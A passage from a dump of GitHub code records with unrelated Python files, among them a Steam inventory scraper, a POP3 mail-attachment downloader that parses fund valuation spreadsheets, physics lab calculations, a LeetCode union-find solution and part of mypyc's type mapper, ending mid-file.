comcom.compare_tps(tool1_label, tool1data, tool2_label, tool2data)\n outfilepath = compare_parameters[\"outdir\"] + \"/\" + compare_parameters[\"output-prefix\"] + \".txt\"\n wrote_file = ufw.write_tp_comparison(outfilepath, comparisondata, tool1_label, tool2_label)\n print(f\"...Wrote comparison output file?: {wrote_file}...\")\n else:\n print(\"Please set the following parameters: \" + \", \".join(incorrect_parameters))\n\n\nif __name__ == \"__main__\":\n main()\n print(\"DONE!\")\n","repo_name":"molgenis/NGS_CNV","sub_path":"scripts/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"10259576380","text":"import sys\nimport time\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndef scroll_down(driver):\n \"\"\"A method for scrolling the page.\"\"\"\n\n # Get scroll height.\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n\n # Scroll down to the bottom.\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load the page.\n time.sleep(0.1)\n\n # Calculate new scroll height and compare with last scroll height.\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n if new_height == last_height:\n\n break\n\n last_height = new_height\n\ndef find_all_CSGO_items(driver: webdriver, profile_id: str , wait:int = 3) -> list:\n profile_url = f\"https://steamcommunity.com/profiles/{profile_id}/inventory/\"\n try:\n driver.get(profile_url)\n select = Select(driver.find_element(By.CSS_SELECTOR,\"#responsive_inventory_select\")) # Create Select instance to work with dropdown\n select.select_by_value('#730') # Choose CSGO \n WebDriverWait(driver, 5).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#acceptAllButton\"))\n ).click()\n scroll_down(driver)\n time.sleep(wait) # When we have number of items we can create wait conditions\n web_element_list = driver.find_elements(By.CSS_SELECTOR,\".item.app730.context2\")\n return web_element_list\n except Exception as e:\n print(e)\n return []\n","repo_name":"bjarkeh97/csgo_middleman","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"24554386929","text":"class Solution:\n def find(self, x, parents):\n if parents[x] == x: return x\n parents[x] = self.find(parents[x], parents)\n return parents[x]\n \n def union(self, x, y, parents, ranks):\n xr, yr = self.find(x, parents), self.find(y, parents)\n if ranks[xr] >= ranks[yr]: parents[yr] = xr\n else: parents[xr] = yr\n if ranks[xr] == ranks[yr]: ranks[xr] += 1\n \n def equationsPossible(self, equations: List[str]) -> bool:\n not_equals = []\n converter = dict()\n conv_idx = 0\n parents = []\n ranks = []\n for i in range(len(equations)):\n a, is_equal, blank, b = equations[i]\n for char in (a, b):\n if char not in converter:\n converter[char] = conv_idx\n parents.append(conv_idx)\n ranks.append(0) \n conv_idx += 1\n is_equal = False if is_equal == '!' else True\n x, y = converter.get(a), converter.get(b)\n if not is_equal:\n not_equals.append((x, y))\n continue\n self.union(x, y, parents, ranks)\n \n for x, y in not_equals:\n if self.find(x, parents) == self.find(y, parents):\n return False\n return True\n \n ","repo_name":"all1m-algorithm-study/LeetCode-Solutions","sub_path":"solutions/990/990-yongjoonseo.py","file_name":"990-yongjoonseo.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"34052596788","text":"\n\ndef init(): \n global videos\n global endpoints\n global request\n global caches\n global tam_cache\n global memorias \n global endpointcache \n global tiempo_endpoint_central \n global descripcion_request \n videos = 0\n endpoints = 0\n request = 0\n caches = 0\n tam_cache = 0\n memorias = []\n endpointcache = []\n tiempo_endpoint_central = []\n descripcion_request = []","repo_name":"mariousm/University","sub_path":"4_Cuarto/Neuronal/Practica3/DatosGoogle.py","file_name":"DatosGoogle.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9700209625","text":"def Fn(name, f, n_out=1): # pylint: disable=invalid-name\n \"\"\"Returns a layer with no weights that applies the function `f`.\n\n `f` can take and return any number of arguments, and takes only positional\n arguments -- no default or keyword arguments. It often uses JAX-numpy (`jnp`).\n The following, for example, would create a layer that takes two inputs and\n returns two outputs -- element-wise sums and maxima:\n\n `Fn('SumAndMax', lambda x0, x1: (x0 + x1, jnp.maximum(x0, x1)), n_out=2)`\n\n The layer's number of inputs (`n_in`) is automatically set to number of\n positional arguments in `f`, but you must explicitly set the number of\n outputs (`n_out`) whenever it's not the default value 1.\n\n Args:\n name: Class-like name for the resulting layer; for use in debugging.\n f: Pure function from input tensors to output tensors, where each input\n tensor is a separate positional arg, e.g., `f(x0, x1) --> x0 + x1`.\n Output tensors must be packaged as specified in the `Layer` class\n docstring.\n n_out: Number of outputs promised by the layer; default value 1.\n\n Returns:\n Layer executing the function `f`.\n \"\"\"\n argspec = inspect.getfullargspec(f)\n if argspec.defaults is not None:\n raise ValueError('Function has default arguments (not allowed).')\n if argspec.varkw is not None:\n raise ValueError('Function has keyword arguments (not allowed).')\n if argspec.varargs is not None:\n raise ValueError('Function has variable args (not allowed).')\n\n def _forward(xs): # pylint: disable=invalid-name\n if not isinstance(xs, (tuple, list)):\n xs = (xs,)\n return f(*xs)\n\n n_in = len(argspec.args)\n name = name or 'Fn'\n return PureLayer(_forward, n_in=n_in, n_out=n_out, name=name)\n","repo_name":"kshitiz28/Text-Summerization","sub_path":"Fn.py","file_name":"Fn.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"26554590398","text":"import poplib\npoplib._MAXLINE = 20480\nimport time\nimport os\nfrom email.parser import Parser\nfrom email.header import decode_header\nfrom email.utils import parseaddr\nfrom openpyxl import Workbook\nimport re\nimport datetime\nfrom tenacity import retry, wait_fixed, stop_after_attempt\nimport xlrd\n\n\n\n# 查找表格所需单元格数据,并返回\ndef find_cell_value_r_c(open_sheet, str_list):\n sheet = open_sheet\n rows = sheet.nrows # 行数\n cols = sheet.ncols # 列数\n #每个要查找值的行数与列数\n row_col = []\n #将row_col的列表再装配到row_col_list中\n row_col_list = []\n for r in range(0, rows):\n for c in range(0, cols):\n got_cell_value = sheet.cell(r, c).value\n for str_ in str_list:\n if str_ in got_cell_value:\n str_row = r\n str_col = c\n row_col.append(str_row)\n row_col.append(str_col)\n row_col_list.append(row_col)\n else:\n print('未找到要查找的值...')\n return row_col_list\n\n# 解码,解析加密传输的字符串成正常字符串\ndef decode_str(s):\n try:\n value, charset = decode_header(s)[0]\n if charset:\n value = value.decode(charset)\n return value\n except:\n pass\n\n@retry(wait=wait_fixed(3), stop=stop_after_attempt(3))\n# 登录邮箱, 获取邮件字符串源文件,解析出主题/发件人邮箱,发送时间, 是否带有附件\ndef log_in(host, user, passwd):\n # 开始登录\n pop_conn = poplib.POP3_SSL(host)\n pop_conn.user(user)\n pop_conn.pass_(passwd)\n pop_conn.noop()\n mail_count = len(pop_conn.list()[1])\n # 显示邮箱状态:邮件数量,占用空间\n # print('Messages: %s. Size: %s' % pop_conn.stat())\n # print('测试信息...\\n邮箱登陆成功! \\n收件箱共有%s封邮件,占用空间%s字节\\n' % (mail_count, pop_conn.stat()[1]))\n return mail_count, pop_conn\n\n\n# 收取某封邮件\ndef retrive(pop_conn, i):\n try:\n resp_s, lines, octets = pop_conn.retr(i)\n except:\n resp_s, lines, octets = log_in(host, user, passwd)[1].retr(i)\n # 解码原始邮件\n try:\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n msg = Parser().parsestr(msg_content)\n\n except:\n li = []\n for line in lines:\n try:\n line_str = line.decode('utf-8')\n li.append(line_str)\n except:\n pass\n li_ = '\\r\\n'.join(li)\n msg = Parser().parsestr(li_)\n # 主题有效性验证\n if msg.get('Subject'):\n subject = decode_str(msg.get('Subject'))\n else:\n subject = \"None\"\n # 日期有效性验证\n try:\n time.strptime(msg.get(\"Date\")[0:24], '%a, %d %b %Y %H:%M:%S')\n date1 = time.strptime(msg.get(\"Date\")[0:24], '%a, %d %b %Y %H:%M:%S') # 格式化收件时间\n send_date_str = time.strftime(\"%Y%m%d\", date1)\n except:\n send_date_str = \"None\"\n pass\n\n # 发件人有效性验证\n if msg.get('From'):\n hdr, addr = parseaddr(msg.get('From'))\n address = u'%s' % (addr) # 发件人邮箱\n else:\n address = \"2\"\n\n return msg, address, subject, send_date_str\n\n\n# 二分法获取某日期邮件的序号\ndef binary_search(mail_count_num, request_date):\n global pop_conn\n print('正在进行二分快速查找,请稍后...')\n start = 0\n n = 0\n end = mail_count_num\n while start <= end:\n n = n + 1\n mid = (start + end) // 2\n if retrive(pop_conn, mid)[3] == \"None\":\n continue\n send_date = retrive(pop_conn, mid)[3]\n if send_date == request_date:\n return mid, n\n elif retrive(pop_conn, mid)[3] > request_date:\n end = mid - 1\n else:\n start = mid + 1\n print('二分法时间复杂度为%s次' % n)\n return start, n\n\n\n# 获取标题中的发件日期\ndef get_title_date(address, subject):\n # 国泰君安标题日期获取\n if address in ['zctgsjfs@tg.gtja.com']:\n title_date_ = re.findall(pattern_1, subject)\n return title_date_\n # 银河证券标题日期获取\n elif address in 'duanjiushuang@chinastock.com.cn':\n title_date_ = ''.join(re.findall(pattern_2, subject))\n return title_date_\n # 申万宏源标题日期获取\n elif address in ['yangfan1@swhysc.com']:\n title_date_ = ''.join(re.findall(pattern_3, subject))\n return title_date_\n # 浙商证券标题日期获取\n elif address in 'zszqwbfw@stocke.com.cn':\n title_date_ = ''.join(re.findall(pattern_4, subject))\n return title_date_\n # 东方证券标题日期获取\n elif address in 'dfjjwb@orientsec.com.cn':\n title_date_ = re.findall(pattern_5, subject)\n return title_date_\n # 国金证券标题日期获取\n elif address in 'cpbbfs@gfund.com':\n title_date_ = re.findall(pattern_6, subject)\n return title_date_\n # 中信证券标题日期获取\n elif address in 'FAreport@citics.com':\n title_date_ = re.findall(pattern_7, subject)\n return title_date_\n # 招商证券标题日期获取\n elif address in ['yywbfa@cmschina.com.cn']:\n title_date_ = re.findall(pattern_8, subject)\n return title_date_\n # 兴业期货标题日期获取\n elif address in ['js@cifutures.com.cn']:\n title_date_ = re.findall(pattern_9, subject)\n return title_date_\n # 中金期货标题日期获取\n elif address in ['cpbbfs@gfund.com']:\n title_date_ = re.findall(pattern_9, subject)\n return title_date_\n # 平安资管标题日期获取\n elif address in ['admin@service.pingan.com']:\n title_date_ = re.findall(pattern_10, subject)\n return title_date_\n # 华润信托标题日期获取\n elif address in ['crtliangy@crctrust.com']:\n title_date_ = re.findall(pattern_11, subject)\n return title_date_\n # 兴业期货标题日期获取\n elif address in ['yezs@cifutures.com.cn']:\n title_date_ = re.findall(pattern_12, subject)\n return title_date_\n # 华泰期货标题日期获取\n elif address in ['zggzhd@htfc.com']:\n title_date_ = re.findall(pattern_13, subject)\n return title_date_\n\n\n# 检查该邮件是否满足要求日期,并下载附件到目录,同时读取该附件获得该表格对象\ndef down_parse_attachment(msg, subject):\n global sheet\n # 下载附件\n for part in msg.walk():\n filename = part.get_filename()\n if filename:\n file_name_ = decode_str(filename)\n data = part.get_payload(decode=True)\n write_file = open(file_name_, 'wb')\n write_file.write(data)\n write_file.close()\n print('邮件主题为:%s' % subject)\n print('附件%s已下载...' % file_name_)\n print('附件下载成功')\n # 读取附件表格\n append_rows = []\n open_workbook = xlrd.open_workbook(file_name_)\n print('开始解析附件...')\n open_sheet = open_workbook.sheet_by_index(0)\n excel_date=open_sheet.cell(find_cell_value_r_c(open_sheet,str_list)[0][0],find_cell_value_r_c(open_sheet,str_list)[0][1]).value\n excel_net_value = open_sheet.cell(find_cell_value_r_c(open_sheet,str_list)[1][0],find_cell_value_r_c(open_sheet,str_list)[1][1]).value\n excel_cash_net = open_sheet.cell(find_cell_value_r_c(open_sheet,str_list)[3][0],find_cell_value_r_c(open_sheet,str_list)[2][1]).value\n excel_secure_cash = open_sheet.cell(find_cell_value_r_c(open_sheet,str_list)[4][0],find_cell_value_r_c(open_sheet,str_list)[2][1]).value\n append_rows.append(excel_date)\n append_rows.append(excel_net_value)\n append_rows.append(excel_cash_net)\n append_rows.append(excel_secure_cash)\n sheet.append(append_rows)\n\n# 各个邮件主题日期正则表达式\n\n# 国泰君安\npattern_1 = re.compile('.*?私募证券投资基金([0-9]{8})', re.S)\n# 银河证券\npattern_2 = re.compile('.*?私募证券投资基金([0-9]{4})年([0-9]{2})月([0-9]{2})日.*?', re.S)\n# 申万宏源\npattern_3 = re.compile('.*?私募证券投资基金_([0-9]{4})-([0-9]{2})-([0-9]{2})', re.S)\n# 浙商证券\npattern_4 = re.compile('.*?私募证券投资基金_([0-9]{4})-([0-9]{2})-([0-9]{2}).*?', re.S)\n# 东方证券\npattern_5 = re.compile('([0-9]{8}).*?', re.S)\n# 国金证券\npattern_6 = re.compile('.*?私募证券投资基金_([0-9]{8})', re.S)\n# 中信证券\npattern_7 = re.compile('.*?估值表_([0-9]{8})', re.S)\n# 招商证券\npattern_8 = re.compile('.*?私募证券投资基金_([0-9]{8})', re.S)\n# 兴业期货\npattern_9 = re.compile('.*?私募证券投资基金_([0-9]{8})', re.S)\n# 中金期货\npattern_10 = re.compile('.*?_([0-9]{8})', re.S)\n# 平安资管\npattern_11 = re.compile('.*?-([0-9]{4})-([0-9]{2})-([0-9]{2})', re.S)\n# 华润信托\npattern_12 = re.compile('.*?估值表([0-9]{8})', re.S)\n# 兴业期货\npattern_13 = re.compile('.*?_([0-9]{4})-([0-9]{2})-([0-9]{2}).*?', re.S)\n\n\n\n\n# 主函数\nif __name__ == '__main__':\n # 保存密码, 输入登陆信息\n if os.path.exists('user_info.txt'):\n with open('user_info.txt', 'r') as read_file:\n user_info = read_file.readlines()\n host = user_info[0].strip()\n user = user_info[1].strip()\n passwd = user_info[2].strip()\n else:\n host = input('请输入邮箱服务器地址:')\n user = input('请输入邮箱地址:')\n passwd = input('请输入邮箱密码:')\n with open('user_info.txt', 'w') as write_file:\n write_file.write(host + '\\n')\n write_file.write(user + '\\n')\n write_file.write(passwd + '\\n')\n #要查找的值的列表\n str_list = ['日期','单位净值','市值','银行存款','存出保证金']\n\n # 登录邮箱,返回对登录邮箱的引用\n mail_count_num, pop_conn = log_in(host, user, passwd)\n\n # 输入要处理邮件的标题日期\n request_date = input('请输入日期,收取今天邮件直接按回车(日期输入格式为20141213) :') # 输入日期\n today = time.localtime(time.time())\n today_str = time.strftime(\"%Y%m%d\", today) # 今天日期格式化\n\n # 根据输入的日期, 建立目录,创建汇总表\n currentpath = os.getcwd() # 获取当前目录\n foldername = request_date # 文件夹名和最后输出文件名\n new_path = os.path.join(currentpath, foldername) # 文件存储路径,字符串\n if os.path.exists(new_path) == False: # 如果文件夹不存在,创建文件夹\n os.makedirs(new_path)\n # 切换工作目录,创建汇总工作簿.xlsx\n os.chdir(new_path)\n wb = Workbook()\n sheet = wb.active\n sheet.column_dimensions['A'].width = 42\n sheet.column_dimensions['B'].width = 9.2\n sheet.column_dimensions['C'].width = 8.4\n sheet.column_dimensions['D'].width = 12\n sheet.column_dimensions['E'].width = 12\n table_head = ['产品名称', '估值日期', '单位净值', '银行存款', '证券余额']\n sheet.append(table_head)\n\n # 开始遍历\n skipped_num = 0\n if request_date == '':\n request_date = today_str\n if (datetime.datetime.strptime(today_str, '%Y%m%d') - datetime.datetime.strptime(request_date, '%Y%m%d')).days >= 7:\n retri_num, fzd = binary_search(mail_count_num, request_date)\n print('开始从第%s封收取...' % retri_num)\n for i in range(retri_num, mail_count_num, 1):\n msg, address, subject, send_date = retrive(pop_conn, i)\n print(subject)\n if get_title_date(address, subject):\n title_date = get_title_date(address, subject)[0]\n if title_date == request_date:\n print('下载邮件...')\n down_parse_attachment(msg, subject)\n print('下载完毕...')\n else:\n skipped_num = skipped_num + 1\n print('标题日期不匹配,跳过...')\n else:\n skipped_num = skipped_num + 1\n print('标题日期不存在,跳过...')\n else:\n for i in range(mail_count_num, 0, -1):\n msg, address, subject, send_date = retrive(pop_conn, i)\n print(subject)\n if get_title_date(address, subject):\n title_date = get_title_date(address, subject)[0]\n if title_date == request_date:\n down_parse_attachment(msg, subject)\n else:\n skipped_num = skipped_num + 1\n print('标题日期不匹配,跳过...')\n else:\n skipped_num = skipped_num + 1\n print('标题日期不存在,跳过...')\n print('一共跳过%s封邮件' % skipped_num)\n\n wb.save('%s汇总表.xlsx' % foldername)\n print('===============任务完成===============\\n')\n pop_conn.quit()\n","repo_name":"915288938lx/email_download_7","sub_path":"email_download_3.py","file_name":"email_download_3.py","file_ext":"py","file_size_in_byte":13051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"27137228254","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nfrom uncertainties import ufloat\nimport uncertainties.unumpy as unp\nimport scipy.constants as const\nfrom pylab import * \n\n\nl = np.array([0.67,0.66,0.66,0.66,0.67,0.67,0.66,0.68,0.67])\nL1 = np.mean(l) #Länge Draht ohne Fehler\ndL = np.std(l, ddof=1) / np.sqrt(len(l)) #Fehler des Mittelwerts\n\nL = ufloat(L1,dL) #Länge Draht\n\nd = np.array([0.00016,0.00017,0.00016,0.00016,0.00017])\nDu = np.mean(d) #Durchmesser Draht\ndD = np.std(d, ddof=1) / np.sqrt(len(d))\nR1 = Du/2\ndR = dD/2\n\nR = ufloat(R1, dR) #Radius Draht\n\nt = np.array([18.544,18.540,18.551,18.570,18.252,18.537,18.579,18.563,18.554,18.589])\nTges = np.mean(t) \ndT = np.std(t, ddof=1) / np.sqrt(len(t))\n\nT = ufloat(Tges, dT) #Periodendauer\n\nMk = ufloat(0.5883, 0.0004*0.5883) #Masse Kugel\n\nRk = ufloat(0.025515, 0.0004*0.025515) #Radius Kugel\n\ntetaKugel = (2/5)*Mk*(Rk**2)\ntetaHalt = 22.5*10**(-7)\n\nteta = tetaKugel + tetaHalt #Trägheitsmoment gesamt\n\n#Berechnung der Mittelwerte\nt0 = np.array([11.310,11.102,11.101]) #Array der Werte\nT00 = np.mean(t0) #Mittelwert\ndT0 = np.std(t0, ddof=1) / np.sqrt(len(t0)) #Fehler des Mittelwerts\nT0 = ufloat(T00,dT0) #Periodendauer mit Fehler\n\nt1 = np.array([8.756,8.779,8.762])\nT01 = np.mean(t1)\ndT1 = np.std(t1, ddof=1) / np.sqrt(len(t1))\nT1 = ufloat(T01,dT1)\n\nt2 = np.array([7.467,7.465,7.460])\nT02 = np.mean(t2)\ndT2 = np.std(t2, ddof=1) / np.sqrt(len(t2))\nT2 = ufloat(T02,dT2)\n\nt3 = np.array([6.583,6.608,6.596])\nT03 = np.mean(t3)\ndT3 = np.std(t3, ddof=1) / np.sqrt(len(t3))\nT3 = ufloat(T03,dT3)\n\nt4 = np.array([5.975,5.973,5.981])\nT04 = np.mean(t4)\ndT4 = np.std(t4, ddof=1) / np.sqrt(len(t4))\nT4 = ufloat(T04,dT4)\n\nt5 = np.array([5.521,5.526,5.519])\nT05 = np.mean(t5)\ndT5 = np.std(t5, ddof=1) / np.sqrt(len(t5))\nT5 = ufloat(T05,dT5)\n\nt6 = np.array([5.136,5.132,5.142])\nT06 = np.mean(t6)\ndT6 = np.std(t6, ddof=1) / np.sqrt(len(t6))\nT6 = ufloat(T06,dT6)\n\nt7 = np.array([4.578,4.577,4.865])\nT07 = np.mean(t7)\ndT7 = np.std(t7, ddof=1) / np.sqrt(len(t7))\nT7 = ufloat(T07,dT7)\n\nt8 = np.array([4.558,4.587,4.556])\nT08 = np.mean(t8)\ndT8 = np.std(t8, ddof=1) / np.sqrt(len(t8))\nT8 = ufloat(T08,dT8)\n\nt9 = np.array([4.336,4.330,4.344])\nT09 = np.mean(t9)\ndT9 = np.std(t9, ddof=1) / np.sqrt(len(t9))\nT9 = ufloat(T09,dT9)\n\n\nTges = np.array([T0,T1,T2,T3,T4,T5,T6,T7,T8,T9]) #Schwingungsdauer\n\nI1 = np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0]) #Stromstärke\ndI = np.array([0.025, 0.05, 0.075, 0.1, 0.125, 0.15, 0.175, 0.2, 0.225, 0.25]) #Fehler Stromstärke (5%)\n\nI = unp.uarray(I1, dI)\n\nmu = const.physical_constants[\"mag. constant\"] #Magnetische Feldkonstante\nMu = mu[0] #Wert von der Konstante\nX = ufloat(0.072,0) #Radius und Abstand Helmholtzspule\nN = ufloat(80,0) #Windungen der Spulen\n\ndef B(X,N,Mu,I): \n return I*Mu*N*X**2/((2*X**2)**(3/2)) #Magnetfeld B\n\nBm = np.mean(B(X,N,Mu,I))\n\ndef G(teta, L, T, R):\n return (8*math.pi*teta*L/((T**2)*(R**4))) #Trägheitsmodul G\n\nD = math.pi*G(teta, L, T, R)*R**4/(2*L) #Richtgröße des Zylinders\n\nx = (unp.nominal_values(B(X,N,Mu,I)))\ny = (unp.nominal_values(1/Tges**2))\n\ndef f(x, m, b): #ausgeichsgrade\n return m*x+b\n\nparams, covariance = curve_fit(f, x, y)\nerrors = np.diag(covariance)\n\nprint('m:', params[0], '+-', errors[0])\nprint('b:', params[1], '+-', errors[1])\n\nplt.plot(x, f(x, *params), 'r-', label = r'Ausgleichsgerade') #ausgleichsgrade\n\nST = ufloat(20.617223278946874, 0.16288964210396956) #Steigung der Ausgleichsgeraden\n\nplt.plot(x, y, 'bo', label=r'Messdaten')\n#plt.show()\n\ndef magnet(ST,Bm,D,teta):\n return 4*(math.pi)**2*ST*teta-(D/Bm)\n\nprint('magnet(ST,Bm,D,teta):',\"{:.5f}\".format(magnet(ST,Bm,D,teta)))","repo_name":"Remponator/MedPhy_AP","sub_path":"V102_Drehschwingung/Auswertung/Magnetisches_Moment.py","file_name":"Magnetisches_Moment.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"13572868122","text":"weight, inputs, goal_pred = 0.0, 1.1, 0.8\n\nfor x in range(4):\n pred = inputs * weight\n error = (pred - goal_pred) ** 2 \n er = goal_pred - pred\n delta = pred - goal_pred # how much node missed\n weight_delta = delta * inputs # derivative\n weight = weight - weight_delta\n\n print('pred= {}\\n error= {}\\n err= {} \\n delta= {}\\n weight_delta= {}\\n weight= {}'.format(pred, error, er, delta, weight_delta, weight))","repo_name":"spctr01/scratch","sub_path":"gradient_decent.py","file_name":"gradient_decent.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"18671512953","text":"\"\"\"\n列表推导式:快速生成列表元素的表达形式,通过for添加列表元素的简洁写法\n推导式基本格式: [计算公式 for 循环 if 判断]\n特点:\n 1)每循环一次,将计算公式的结果添加到列表中\n 2)计算公式可以使用遍历出的数据\n 3)for 遍历出的数据 必须满足 if 判断 才会使用计算公式生成元素\n\"\"\"\n\n\"\"\"\n需求:产生列表[0, 1, 2, 3, 4]\n\"\"\"\n\nmy_list = []\n\nfor i in range(0, 5):\n my_list.append(i)\n\nprint(my_list)\n\n# 形式1:[计算表达式 for 循环]\nmy_list = [i for i in range(0, 5)]\nprint(my_list)\n\n\"\"\"\n需求:产生列表[0, 2, 4, 6, 8, 10]\n\"\"\"\n\nmy_list = [i for i in range(0, 11, 2)]\nprint(my_list)\n\nmy_list = [i * 2 for i in range(0, 6)]\nprint(my_list)\n\n\"\"\"\n需求:有一个字符串'hello',生成['h', 'e', 'l', 'l', 'o']\n\"\"\"\n\n# print(list('hello'))\nmy_list = [c for c in 'hello']\nprint(my_list)\n\n\"\"\"\n需求:有一个列表[2, 1, 3, 4, 8, 9, 7],需要将列表中的偶数筛选出来,存成一个新列表:[2, 4, 8]\n\"\"\"\nmy_list = [2, 1, 3, 4, 8, 9, 7]\n\n# 思路:遍历 my_list 中的每个数据,判断数据是否为偶数,如果是偶数,则添加到新列表中\nret = []\nfor i in my_list:\n if i % 2 == 0:\n ret.append(i)\n\nprint(ret)\n\n# 形式2:[计算表达式 for 循环 if 条件]\nret = [i for i in my_list if i % 2 == 0]\nprint(ret)","repo_name":"ekolzzz/BigData","sub_path":"Python/0-basic/smart/day06/07-列表推导式.py","file_name":"07-列表推导式.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9990006098","text":"\"\"\"Maintain a mapping from mypy concepts to IR/compiled concepts.\"\"\"\n\nfrom typing import Dict, Optional\n\nfrom mypy.nodes import FuncDef, TypeInfo, SymbolNode, ArgKind, ARG_STAR, ARG_STAR2\nfrom mypy.types import (\n Instance, Type, CallableType, LiteralType, TypedDictType, UnboundType, PartialType,\n UninhabitedType, Overloaded, UnionType, TypeType, AnyType, NoneTyp, TupleType, TypeVarType,\n get_proper_type\n)\n\nfrom mypyc.ir.rtypes import (\n RType, RUnion, RTuple, RInstance, object_rprimitive, dict_rprimitive, tuple_rprimitive,\n none_rprimitive, int_rprimitive, float_rprimitive, str_rprimitive, bool_rprimitive,\n list_rprimitive, set_rprimitive, range_rprimitive, bytes_rprimitive\n)\nfrom mypyc.ir.func_ir import FuncSignature, FuncDecl, RuntimeArg\nfrom mypyc.ir.class_ir import ClassIR\n\n\nclass Mapper:\n \"\"\"Keep track of mappings from mypy concepts to IR concepts.\n\n For example, we keep track of how the mypy TypeInfos of compiled\n classes map to class IR objects.\n\n This state is shared across all modules being compiled in all\n compilation groups.\n \"\"\"\n\n def __init__(self, group_map: Dict[str, Optional[str]]) -> None:\n self.group_map = group_map\n self.type_to_ir: Dict[TypeInfo, ClassIR] = {}\n self.func_to_decl: Dict[SymbolNode, FuncDecl] = {}\n\n def type_to_rtype(self, typ: Optional[Type]) -> RType:\n if typ is None:\n return object_rprimitive\n\n typ = get_proper_type(typ)\n if isinstance(typ, Instance):\n if typ.type.fullname == 'builtins.int':\n return int_rprimitive\n elif typ.type.fullname == 'builtins.float':\n return float_rprimitive\n elif typ.type.fullname == 'builtins.bool':\n return bool_rprimitive\n elif typ.type.fullname == 'builtins.str':\n return str_rprimitive\n elif typ.type.fullname == 'builtins.bytes':\n return bytes_rprimitive\n elif typ.type.fullname == 'builtins.list':\n return list_rprimitive\n # Dict subclasses are at least somewhat common and we\n # specifically support them, so make sure that dict operations\n # get optimized on them.\n elif any(cls.fullname == 'builtins.dict' for cls in typ.type.mro):\n return dict_rprimitive\n elif typ.type.fullname == 'builtins.set':\n return set_rprimitive\n elif typ.type.fullname == 'builtins.tuple':\n return tuple_rprimitive # Varying-length tuple\n elif typ.type.fullname == 'builtins.range':\n return range_rprimitive\n elif typ.type in self.type_to_ir:\n inst = RInstance(self.type_to_ir[typ.type])\n # Treat protocols as Union[protocol, object], so that we can do fast\n # method calls in the cases where the protocol is explicitly inherited from\n # and fall back to generic operations when it isn't.\n if typ.type.is_protocol:\n return RUnion([inst, object_rprimitive])\n else:\n return inst\n else:\n return object_rprimitive\n elif isinstance(typ, TupleType):\n # Use our unboxed tuples for raw tuples but fall back to\n # being boxed for NamedTuple.\n if typ.partial_fallback.type.fullname == 'builtins.tuple':\n return RTuple([self.type_to_rtype(t) for t in typ.items])\n else:\n return tuple_rprimitive\n elif isinstance(typ, CallableType):\n return object_rprimitive\n elif isinstance(typ, NoneTyp):\n return none_rprimitive\n elif isinstance(typ, UnionType):\n return RUnion([self.type_to_rtype(item)\n for item in typ.items])\n elif isinstance(typ, AnyType):\n return object_rprimitive\n elif isinstance(typ, TypeType):\n return object_rprimitive\n elif isinstance(typ, TypeVarType):\n # Erase type variable to upper bound.\n # TODO: Erase to union if object has value restriction?\n return self.type_to_rtype(typ.upper_bound)\n elif isinstance(typ, PartialType):\n assert typ.var.type is not None\n return self.type_to_rtype(typ.var.type)\n elif isinstance(typ, Overloaded):\n return object_rprimitive\n elif isinstance(typ, TypedDictType):\n return dict_rprimitive\n elif isinstance(typ, LiteralType):\n return self.type_to_rtype(typ.fallback)\n elif isinstance(typ, (UninhabitedType, UnboundType)):\n # Sure, whatever!\n return object_rprimitive\n\n # I think we've covered everything that is supposed to\n # actually show up, so anything else is a bug somewhere.\n assert False, 'unexpected type %s' % type(typ)\n\n def get_arg_rtype(self, typ: Type, kind: ArgKind) -> RType:\n if kind == ARG_STAR:\n return tuple_rprimitive\n elif kind == ARG_STAR2:\n return dict_rprimitive\n else:\n return self.type_to_rtype(typ)\n\n def fdef_to_sig(self, fdef: FuncDef) -> FuncSignature:\n if isinstance(fdef.type, CallableType):\n arg_types = [self.get_arg_rtype(typ, kind)\n for typ, kind in zip(fdef.type.arg_types, fdef.type.arg_kinds)]\n arg_pos_onlys = [name is None for name in fdef.type.arg_names]\n ret = self.type_to_rtype(fdef.type.ret_type)\n else:\n # Handle unannotated functions\n arg_types = [object_rprimitive for arg in fdef.arguments]\n arg_pos_onlys = [arg.pos_only for arg in fdef.arguments]\n # We at least know the return type for __init__ methods will be None.\n is_init_method = fdef.name == '__init__' and bool(fdef.info)\n if is_init_method:\n ret = none_rprimitive\n else:\n ret = object_rprimitive\n\n # mypyc FuncSignatures (unlike mypy types) want to have a name\n # present even when the argument is position only, since it is\n # the sole way that FuncDecl arguments are tracked. This is\n # generally fine except in some cases (like for computing\n # init_sig) we need to produce FuncSignatures from a\n # deserialized FuncDef that lacks arguments. We won't ever\n # need to use those inside of a FuncIR, so we 